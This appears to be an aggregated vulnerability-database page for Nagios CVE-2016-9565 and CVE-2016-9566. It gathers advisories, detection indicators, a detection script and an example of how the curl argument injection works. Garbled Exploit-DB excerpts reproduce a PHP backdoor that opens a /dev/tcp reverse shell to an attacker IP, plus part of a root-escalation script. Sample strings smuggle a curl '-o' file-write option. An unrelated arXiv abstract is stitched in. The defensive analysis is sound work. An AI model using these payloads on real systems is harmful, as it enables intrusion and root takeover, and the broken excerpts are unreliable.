CVE-2016-9565
Published 2016-12-15
Priority P2 · 71 · critical · 9.8 (CVSS 3.0)
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit available · EPSS 22.68% (97.4th percentile)
MagpieRSS, as used in the front-end component in Nagios Core before 4.2.2 might allow remote attackers to read or write to arbitrary files by spoofing a crafted response from the Nagios RSS feed server. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4796.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nagios | nagios | <= 4.2.1 | — |
| nagios | nagios | <= 4.2.3 | — |
Detection & IOCs (extracted from sources)
- Monitor for creation of, or writes to, /etc/ld.so.preload by the nagios user or group; that is the symlink-based privilege-escalation stage (CVE-2016-9566) chained after CVE-2016-9565.
- Detect HTTP responses to Nagios RSS feed requests (rss-corefeed.php) whose Server header contains PHP webshell code: the exploit injects its backdoor through a spoofed feed-server response.
- Alert on creation of PHP files (e.g. nagios-backdoor.php) in the Nagios web root; this is the persistence mechanism the exploit drops.
- Detect outbound connections from the Nagios web server process (e.g. apache/www-data) to attacker-controlled IPs on arbitrary ports, indicative of a reverse shell spawned from the PHP backdoor.
- Monitor requests to /nagios/rss-corefeed.php that are followed by outbound HTTP/HTTPS connections to unexpected external hosts; the exploit relies on DNS spoofing to redirect this feed fetch to an attacker server.
- Detect a shared-library path being injected through the Nagios external command pipe (nagios.cmd); the privilege-escalation stage uses this to get an attacker-chosen entry written into /etc/ld.so.preload through the symlinked log file.
- The vulnerability exists because of an incomplete fix for CVE-2008-4796; upgrading to Nagios Core 4.2.2 or later is required to fully remediate it.
- Disabling the RSS feed components (rss-corefeed.php, rss-newsfeed.php and the rss includes directory) removes the attack surface at the cost of the Nagios news widget.
- CVE-2016-9565 gives a remote attacker nagios group access, which can then be chained with CVE-2016-9566 (symlink attack on the log file) to escalate to root.
- The /etc/ld.so.preload symlink stage (CVE-2016-9566) requires the attacker to already be running as the nagios user or a member of the nagios group, as obtained via CVE-2016-9565.
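One way to turn the IOC list above into checks, as an added example in Python that is not from any of the page's sources: the allowed feed host set, the baseline of known-good PHP files, the log and preload paths, and all sample responses are constructed for the example and are assumptions, not values taken from a real deployment.

```python
# Added detection example (constructed for this page, not from any of its
# sources): triage captured responses to Nagios RSS feed fetches, diff the
# Nagios web root against a known-good file list, and check the two files the
# CVE-2016-9566 stage touches. FEED_HOSTS, the baseline, all paths and the
# sample responses below are assumptions made for the example.
import os
import re
from urllib.parse import urlsplit

FEED_HOSTS = {"www.nagios.org"}  # assumed: hosts rss-corefeed.php may fetch from
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
OPTION_INJECT = re.compile(r"\s-{1,2}[A-Za-z]")  # " -o", " --output" after a URL


def parse_head(raw):
    """Status line + headers of one raw HTTP response -> {lowercase name: value}."""
    headers = {}
    for line in raw.split("\r\n")[1:]:
        if not line:  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def triage_feed_response(raw):
    """Findings for one captured feed-server response (header-side IOCs)."""
    headers = parse_head(raw)
    findings = []
    for name, value in headers.items():
        if PHP_TAG.search(value):  # e.g. a Server header carrying a PHP backdoor
            findings.append("php-code-in-header:" + name)
    loc = headers.get("location")
    if loc:
        if OPTION_INJECT.search(loc):  # curl argument smuggled via the redirect URL
            findings.append("option-injection-in-location")
        if urlsplit(loc.split()[0]).hostname not in FEED_HOSTS:
            findings.append("redirect-off-feed-host")
    return findings


def unexpected_php(paths, baseline):
    """PHP files (paths relative to the web root) missing from the baseline."""
    return sorted(p for p in paths if p.lower().endswith(".php") and p not in baseline)


def list_webroot(webroot):
    """Relative paths of every file under the web root."""
    for dirpath, _, files in os.walk(webroot):
        for f in files:
            yield os.path.relpath(os.path.join(dirpath, f), webroot)


def suspicious_preload_entries(text):
    """Lines of an ld.so.preload file that are not plain system-library paths.
    A log line written through the symlink contains spaces and a timestamp."""
    bad = []
    for line in text.splitlines():
        entry = line.strip()
        if entry and (" " in entry or not entry.startswith(("/lib", "/usr/lib"))):
            bad.append(entry)
    return bad


def privesc_findings(nagios_log, preload="/etc/ld.so.preload"):
    """CVE-2016-9566 stage: the log file turned into a symlink, and/or
    /etc/ld.so.preload holding entries that are not system libraries."""
    findings = []
    if os.path.islink(nagios_log):
        findings.append("nagios-log-is-symlink:" + os.readlink(nagios_log))
    if os.path.isfile(preload):
        with open(preload, errors="replace") as fh:
            findings += ["suspicious-preload-entry:" + e
                         for e in suspicious_preload_entries(fh.read())]
    return findings


# Constructed samples (not real captures).
SPOOFED = ("HTTP/1.1 200 OK\r\nServer: <?php echo 'spoofed'; ?>\r\n"
           "Content-Type: text/xml\r\n\r\n<rss/>")
REDIRECT = ("HTTP/1.1 302 Found\r\nLocation: https://www.nagios.org/feed.xml"
            " -o /usr/local/nagios/share/dropped.php\r\n\r\n")
BENIGN = "HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/xml\r\n\r\n<rss/>"

if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED), ("redirect", REDIRECT), ("benign", BENIGN)):
        print(label, triage_feed_response(raw))
    # Assumed install prefix and baseline; adjust both for the real host.
    webroot = "/usr/local/nagios/share"
    if os.path.isdir(webroot):
        print(unexpected_php(list_webroot(webroot), {"index.php", "main.php"}))
    print(privesc_findings("/usr/local/nagios/var/nagios.log"))
```

The header checks run on captured responses (a proxy or PCAP export), so they work after the fact; the web-root and preload checks are host-side and are the ones worth scheduling, since a dropped .php or a rewritten /etc/ld.so.preload persists long after the spoofed fetch.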
CVSS provenance
- nvd v3.0: 9.8 CRITICAL (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- nvd v2.0: 7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)
- osv: 10.0 CRITICAL
- vendor_redhat: 10.0 CRITICAL
GHSA
GHSA-828p-3vwg-wc22 · ghsa_unreviewed · 2022-05-14 · CVSS 10.0 · CVE-2016-9565 [CRITICAL] · CWE-284
MagpieRSS, as used in the front-end component in Nagios Core before 4.2.2 might allow remote attackers to read or write to arbitrary files by spoofing a crafted response from the Nagios RSS feed server. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4796.
GHSA
GHSA-9332-j4wp-2xcq (base/logging) · ghsa_unreviewed · 2022-05-14 · CVSS 9.8 · CVE-2016-9566 [CRITICAL] · CWE-59
base/logging.c in Nagios Core before 4.2.4 allows local users with access to an account in the nagios group to gain root privileges via a symlink attack on the log file. NOTE: this can be leveraged by remote attackers using CVE-2016-9565.
OSV
CVE-2016-9566 (base/logging) · osv · 2016-12-15 · CVSS 9.8 · [CRITICAL]
base/logging.c in Nagios Core before 4.2.4 allows local users with access to an account in the nagios group to gain root privileges via a symlink attack on the log file. NOTE: this can be leveraged by remote attackers using CVE-2016-9565.
OSV
CVE-2016-9565 · osv · 2016-12-15 · CVSS 10.0 · [CRITICAL]
MagpieRSS, as used in the front-end component in Nagios Core before 4.2.2 might allow remote attackers to read or write to arbitrary files by spoofing a crafted response from the Nagios RSS feed server. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4796.
Red Hat
nagios: Command injection via curl in MagpieRSS · vendor_redhat · 2016-12-13 · CVSS 10.0 · CVE-2016-9565 [CRITICAL] · CWE-77
MagpieRSS, as used in the front-end component in Nagios Core before 4.2.2 might allow remote attackers to read or write to arbitrary files by spoofing a crafted response from the Nagios RSS feed server. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4796.
It was found that an attacker who could control the content of an RSS feed could execute code remotely using the Nagios web interface. This flaw could be used to gain access to the remote system and in some scenarios control over the system.
Mitigation (Red Hat's script, as extracted):

```bash
#!/bin/bash
mv /usr/share/nagios/html/includes/rss /usr/share/nagios/html/includes/rss.disarmed
mv /usr/share/nagios/html/rss-corefeed.php /usr/share/nagios/html/rss-corefeed.php.disarmed
mv /usr/share/nagios/htm
```
Red Hat
nagios: Privilege escalation issue · vendor_redhat · 2016-12-07 · CVSS 9.8 · CVE-2016-9566 [CRITICAL] · CWE-59
base/logging.c in Nagios Core before 4.2.4 allows local users with access to an account in the nagios group to gain root privileges via a symlink attack on the log file. NOTE: this can be leveraged by remote attackers using CVE-2016-9565.
A privilege escalation flaw was found in the way Nagios handled log files. An attacker able to control the Nagios logging configuration (the 'nagios' user/group) could use this flaw to elevate their privileges to root.
- nagios (Red Hat Mobile Application Platform 4): Affected
- nagios (Red Hat OpenStack Platform 10 (Newton)): Not affected
- nagios (Red Hat OpenStack Platform 8 (Liberty)): Not affected
- nagios (Red Hat OpenStack Platform 9 (Mitaka)): Not affected
Exploit-DB
Nagios < 4.2.2 - Arbitrary Code Execution · exploitdb · 2016-12-15 · CVSS 9.8 · CVE-2016-9565 [CRITICAL]
Excerpt (Python 2, incomplete as extracted):

```python
# Nagios /dev/tcp/192.168.57.3/8080 0&1 &'"); ?> is not blacklisted
#
# which will do the trick as it won't mess up the payload :)
        self.add_header('Server', backdoor)
        # Return XML/feed with JavaScript payload that will run the backdoor code from nagios-backdoor.php via tag :)
        print "[*] Feed XML with JS payload returned to the client in the response. This should load nagios-backdoor.php in no time :) \n"
        self.write(xmldata)
        self.finish()
        tornado.ioloop.IOLoop.instance().stop()

if __name__ == "__main__":
    global backdoor_path
    global backdoor
    print intro
    # Set attacker's external IP & port to be used by the reverse shell
    if len(sys.argv) /dev/tcp/%s/%s 0&1 &'"); die("stop processing"); ?>""" % (attacker_ip, attacker_port)
    # Feed XML containing JavaScript payload that will load the nagios
```
Exploit-DB
Nagios < 4.2.4 - Local Privilege Escalation · exploitdb · 2016-12-15 · CVSS 9.8 · CVE-2016-9566 [CRITICAL]
Excerpt (bash, incomplete as extracted):

```bash
# Nagios /etc/ld.so.preload
    fi
    echo -e "\n[+] Job done. Exiting with code $1 \n"
    exit $1
}

function ctrl_c() {
    echo -e "\n[+] Ctrl+C pressed"
    cleanexit 0
}

#intro
echo -e "\033[94m \nNagios Core - Root Privilege Escalation PoC Exploit (CVE-2016-9566) \nnagios-root-privesc.sh (ver. 1.0)\n"
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m"

# Priv check
echo -e "\n[+] Starting the exploit as: \n\033[94m`id`\033[0m"
id | grep -q nagios
if [ $? -ne 0 ]; then
    echo -e "\n[!] You need to execute the exploit as 'nagios' user or 'nagios' group ! Exiting.\n"
    exit 3
fi

# Set target paths
ERRORLOG="$1"
if [ ! -f "$ERRORLOG" ]; then
    echo -e "\n[!] Provided Nagios log path ($ERRORLOG) doesn't exist. Try again. E.g: \n"
    echo -e "./nagios-root-privesc.sh /usr/local
```
Bugzilla
CVE-2016-9565 nagios: Command injection via curl in MagpieRSS [fedora-all] · bugzilla · 2016-12-16 · CVSS 9.8 · [CRITICAL]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported versions of Fed
Bugzilla
CVE-2016-9565 nagios: Command injection via curl in MagpieRSS · bugzilla · 2016-12-16 · CVSS 10.0 · [CRITICAL]
MagpieRSS, a component for handling RSS news feeds in Nagios Core control panel / front-end, was found vulnerable to command injection due to insufficient neutralization of special elements in function _httpsrequest().
The vulnerability could potentially enable remote unauthenticated attackers who managed to impersonate the feed server (via DNS poisoning, domain hijacking, ARP spoofing etc.), to provide a malicious response that injects parameters to curl command used by the affected RSS client class and effectively read/write arbitrary files on the vulnerable Nagios server. This could lead to Remote Code Execution in the context of www-data/nagios user on default Nagios installs that follow the official setup guidelines.
Thi
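The argument-injection mechanism the entry above describes, as an added example in Python that is not code from MagpieRSS, Snoopy, Nagios or any of the page's sources. `escapeshellcmd_like()` is an approximation of PHP's escapeshellcmd() (the exact escaped set is an assumption; the property that matters, that whitespace is left alone, is what the example relies on), `FEED_HOST` and the sample redirect URL are assumed, and neither path runs curl: both only build the argv that curl would receive.

```python
# Added example (not code from MagpieRSS, Snoopy or Nagios): why escaping shell
# metacharacters in a URL is an incomplete fix when the escaped string is still
# handed to a shell as part of a curl command line. escapeshellcmd_like() is an
# approximation of PHP's escapeshellcmd() (assumption: it escapes these
# metacharacters and, like the original, leaves whitespace alone).
# Nothing here executes curl; both paths only build the argv curl would see.
import re
import shlex
from urllib.parse import urlsplit

# Metacharacters escapeshellcmd() prefixes with a backslash (assumed list).
_META = set("#&;`|*?~<>^()[]{}$\\\n'\"")

FEED_HOST = "www.nagios.org"  # assumed: the configured Nagios feed host


def escapeshellcmd_like(s):
    """Escape shell metacharacters only; a plain space survives untouched."""
    return "".join("\\" + c if c in _META else c for c in s)


def vulnerable_argv(url):
    """Vulnerable pattern: one command-line string, split by the shell.
    `;`, `|`, `$()` can no longer start a second command (the CVE-2008-4796
    fix), but a space still ends the URL token, so everything after it
    becomes further curl arguments chosen by the remote feed server."""
    cmd = "curl -s " + escapeshellcmd_like(url)
    return shlex.split(cmd)  # what /bin/sh would hand to curl


def smuggled_options(url):
    """Curl options that a response-controlled URL manages to inject."""
    return [a for a in vulnerable_argv(url)[3:] if a.startswith("-")]


def hardened_argv(url):
    """Hardened pattern: validate the URL the remote side gave us, then pass
    it as a single argv element with no shell involved. Remote data can then
    never be split into options, whatever characters it contains."""
    if re.search(r"[\s\x00]", url):
        raise ValueError("whitespace or NUL in URL")
    parts = urlsplit(url)
    if parts.scheme != "https":
        raise ValueError("feed must be fetched over https")
    if parts.hostname != FEED_HOST:
        raise ValueError("URL points away from the configured feed host")
    # No -L: redirects from the feed server are not followed. --proto =https
    # pins the scheme on the curl side as well.
    return ["curl", "-s", "--proto", "=https", url]


# Constructed sample: a redirect Location a spoofed feed server could return.
INJECTED = "https://www.nagios.org/feed.xml -o /usr/local/nagios/share/dropped.php"

if __name__ == "__main__":
    print("vulnerable argv:", vulnerable_argv(INJECTED))
    print("smuggled options:", smuggled_options(INJECTED))
    print("metachar case:", vulnerable_argv("https://www.nagios.org/x;id"))
    try:
        hardened_argv(INJECTED)
    except ValueError as e:
        print("hardened path rejected it:", e)
    print("hardened argv:", hardened_argv("https://www.nagios.org/feed.xml"))
```

Run it directly to see both argv lists side by side. The vulnerable path does neutralize `;` and friends, so the original command injection is gone, yet `-o` still arrives as a separate curl option, which is exactly the read/write-arbitrary-files primitive the advisory describes; the hardened path rejects the URL outright and, for the legitimate case, never involves a shell at all.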
Bugzilla
CVE-2016-9565 nagios: Command injection via curl in MagpieRSS [epel-all] · bugzilla · 2016-12-16 · CVSS 9.8 · [CRITICAL]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported versions of
arXiv
Extended Abstract: Mimicry Resilient Program Behavior Modeling with LSTM based Branch Models · arxiv_fulltext · 2018-03-24
Hayoon Yi (1, *), Gyuwan Kim (1, 2, *), Jangho Lee (1), Sunwoo Ahn (1), Younghan Lee (1), Sungroh Yoon (1, †), Yunheung Paek (1, †)
1: Dept. of Electrical and Computer Engineering, Seoul National University
2: Search Solutions, Inc
*: Equal contribution; †: Corresponding author
## Abstract
In software design, protecting a computer system from the plethora of software attacks or malware in the wild has become increasingly important. In one branch of research on detecting attacks or malware, much work has focused on modeling the runtime behavior of a program. Stemming from the seminal work of Forrest et al., one of the main tools to model program
References
- http://packetstormsecurity.com/files/140169/Nagios-Core-Curl-Command-Injection-Code-Execution.html
- http://rhn.redhat.com/errata/RHSA-2017-0211.html
- http://rhn.redhat.com/errata/RHSA-2017-0212.html
- http://rhn.redhat.com/errata/RHSA-2017-0213.html
- http://rhn.redhat.com/errata/RHSA-2017-0214.html
- http://rhn.redhat.com/errata/RHSA-2017-0258.html
- http://rhn.redhat.com/errata/RHSA-2017-0259.html
- http://seclists.org/fulldisclosure/2016/Dec/57
- http://www.securityfocus.com/archive/1/539925/100/0/threaded
- http://www.securityfocus.com/bid/94922
- http://www.securitytracker.com/id/1037488
- https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
- https://security.gentoo.org/glsa/201702-26
- https://security.gentoo.org/glsa/201710-20
- https://www.exploit-db.com/exploits/40920/
- https://www.nagios.org/projects/nagios-core/history/4x/